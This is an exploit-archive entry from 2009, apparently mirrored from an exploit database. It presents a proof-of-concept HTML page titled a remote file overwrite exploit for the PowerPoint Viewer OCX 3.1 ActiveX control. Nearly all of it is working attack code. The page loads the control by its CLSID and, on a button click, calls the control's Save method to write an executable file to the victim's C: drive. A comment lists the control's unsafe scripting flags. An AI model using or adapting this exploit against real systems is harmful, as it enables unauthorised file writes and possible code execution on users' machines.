[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PowerPoint Viewer OCX 3.1 Remote File Overwrite Exploit
# Published : 2009-01-13
# Author : Stack
# Previous Title : NetSurf Web Browser 1.2 Multiple Remote Vulnerabilities
# Next Title : dBpowerAMP Audio Player 2 .PLS File Local Buffer Overflow PoC
<HTML>
---------------------------------------------------------- <br>
PowerPoint Viewer OCX v3.1 <br>
---------------------------------------------------------- <br>
-----------------------------------<br>
# By Mountassif Moad a.k.a Stack #
-----------------------------------<br>
<!--
v4 Team & evil finger
Class OA
GUID: {97AF4A45-49BE-4485-9F55-91AB40F22B92}
Number of Interfaces: 1
Default Interface: _DOA
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
Report for Clsid: {97AF4A45-49BE-4485-9F55-91AB40F22B92}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data -->
<title>PowerPoint Viewer OCX v3.1 </title>
<BODY>
<object id=Stack classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F22B92}"></object>
<SCRIPT>
function Do_it()
{
File = "c:\St_.exe"
Stack.Save(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Click here To Test"><br>
</body>
</HTML>
# www.Syue.com [2009-01-13]